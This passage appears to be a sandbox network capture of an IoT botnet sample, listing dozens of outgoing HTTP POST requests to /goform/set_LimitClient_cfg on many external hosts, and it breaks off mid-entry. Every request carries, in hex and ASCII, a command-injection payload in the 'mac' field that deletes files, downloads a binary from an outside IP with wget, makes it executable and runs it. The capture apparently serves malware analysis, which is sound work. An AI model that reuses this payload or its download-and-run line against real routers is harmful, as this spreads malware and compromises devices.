                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2075192.168.2.235893244.204.89.1198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428839922 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2076192.168.2.23417304.151.7.1188080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428841114 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2077192.168.2.2358208218.148.182.348080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428859949 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2078192.168.2.2352526198.205.165.1978080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428862095 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2079192.168.2.235098042.130.159.328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428896904 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2080192.168.2.2355578171.170.175.778080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428899050 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2081192.168.2.2336928189.179.174.448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428989887 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2082192.168.2.235443880.176.255.1018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429347992 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2083192.168.2.235284647.112.169.2038080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429363966 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2084192.168.2.2350748113.87.60.1418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429378033 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2085192.168.2.2357806193.31.18.1168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429393053 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2086192.168.2.234376296.249.36.978080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429404974 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2087192.168.2.233753859.197.98.1938080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429425001 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2088192.168.2.2359720155.200.20.1978080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429447889 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2089192.168.2.2353544165.176.244.1168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429469109 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2090192.168.2.2334854201.231.126.648080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429512024 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2091192.168.2.2341446138.15.254.1258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429534912 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2092192.168.2.2347268171.3.253.1098080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429568052 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2093192.168.2.2340616149.32.152.1818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429605007 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2094192.168.2.2333090113.239.90.808080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429608107 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2095192.168.2.2352474138.228.41.2058080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429632902 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2096192.168.2.2351886128.177.102.228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429650068 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2097192.168.2.2348326168.150.181.728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429662943 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
